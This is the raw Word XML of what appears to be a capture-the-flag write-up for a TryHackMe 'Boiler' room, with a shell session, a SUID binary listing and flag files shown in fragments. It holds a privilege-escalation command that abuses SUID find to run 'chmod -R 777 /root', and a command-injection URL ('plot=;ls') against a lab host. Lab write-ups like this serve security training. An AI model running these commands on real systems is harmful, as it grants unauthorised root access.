          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431D5456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backup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57393F95" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4916E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$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su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stoner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFE18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Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237CA4F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:/home/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basterd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cd ~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD1107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ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271675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total 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395703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-x--- 3 stoner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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FE7CA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4 root  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22  2019 ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C0176A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drwxrwxr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2 stoner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4096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22  2019 .nano</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F329A6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-r--r-- 1 stoner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 34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21  2019 .secret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="135AF75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lastRenderedPageBreak/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$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cat .secret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23CF200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You made it till here, well done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D0742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You made it till here, well done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC50D4" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A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What did you exploit to get the privileged user?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115DDC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find / -perm /4000 -type f -exec ls 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ld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{} \; 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9485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38900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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0689555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30112 Jul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12  2016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fusermount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D9B26A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26492 May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15  2019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umount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24266B73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34812 May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15  2019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/bin/mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F4D6A4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43316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May  7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2014 /bin/ping6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB56C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38932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May  7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2014 /bin/ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289DCEA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13960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27  2019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/lib/policykit-1/polkit-agent-helper-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E21A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rwsr-xr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-- 1 root www-data 13692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Apr  3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2019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/lib/apache2/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suexec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-custom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DF1F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rwsr-xr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-- 1 root www-data 13692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Apr  3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2019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/lib/apache2/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suexec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-pristine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A8529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rwsr-xr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-- 1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messagebus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46436 Jun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10  2019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/lib/dbus-1.0/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dbus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-daemon-launch-helper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B755E1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513528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Mar  4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2019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/lib/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openssh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/ssh-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keysign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10A7A67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5480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27  2017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/lib/eject/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dmcrypt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-get-device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB1FA5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36288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newgidmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61E9B7A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-r-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232196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Feb  8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 2016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/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E389DFF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daemon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daemon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50748 Jan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15  2016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/bin/at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D122F4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39560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chsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DACA95B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74280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chfn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63E9FDD8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53128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/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC35F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34680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newgrp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="297001AE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159852 Jun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11  2019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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48FD30B9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18216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27  2019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pkexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3443121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78012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gpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C1A7B0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36288 Mar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26  2019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/bin/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newuidmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EEEF151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-r-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xr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-x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232196 Feb 8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2016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 xml:space="preserve"> /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usr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/bin/find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACA397" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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  <w:t>root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0CB8BC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$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find .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-exec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chmod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-R 777 /root \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17FF2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ls -l /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA55D5A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total 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FB3736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-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rwxrwxrwx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1 root </w:t>
      </w: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root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29 Aug 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21  2019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root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181F3A7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 cat /root/root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D09C2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It wasn't that hard, was it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C4B3D" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A53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proofErr w:type="spell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stoner@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spell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:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7F60D0" w14:textId="77777777" w:rsidR="00461A53" w:rsidRPr="00461A53" w:rsidRDefault="00461A53" w:rsidP="00461A5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F2328"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461A53">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:eastAsia="Times New Roman" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="1F2328"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>It wasn't that hard, was it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529442EC" w14:textId="77777777" w:rsidR="00461A53" w:rsidRDefault="00461A53"/>
    <w:sectPr w:rsidR="00461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2AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECE21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42665"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73C0F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B6756"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F8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07674"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CF84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F5F29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6982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A3D1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A602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00CED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32F4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064EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="84D8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47E67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="353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C60C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C30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A5398"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="620CD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673D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4B6A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D3C2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="934C5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678A3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D25C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871A82"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CB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FD73CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D46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1249E4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB7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957771">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1965190391">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="31350002">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="703792702">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1304310260">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="355548540">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1108817598">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1943032556">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="676544051">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1301884691">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1371341027">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1172720204">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="372120802">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="2046513699">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2019000152">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="641085189">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="75910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3"/>
    <w:rsid w:val="00461A53"/>
    <w:rsid w:val="007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9CF90"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0DAA26B5-0DD8-E04C-BDBF-92049079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A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1A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461A5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1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1A53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pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00461A53"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-pds">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00461A53"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-cce">
    <w:name w:val="pl-cce"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00461A53"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00461A53"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-smi">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00461A53"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00461A53"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0046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57.168/joomla/_t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10.57.168/joomla/_fi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.10.57.168:1000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yhackme.com/room/boilerctf2" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.57.168/joomla/_test/index.php?plot=;ls%20-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ploit-db.com/exploits/4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Upreti(2409501344)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Suman Upreti(2409501344)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-11T11:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-11T11:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>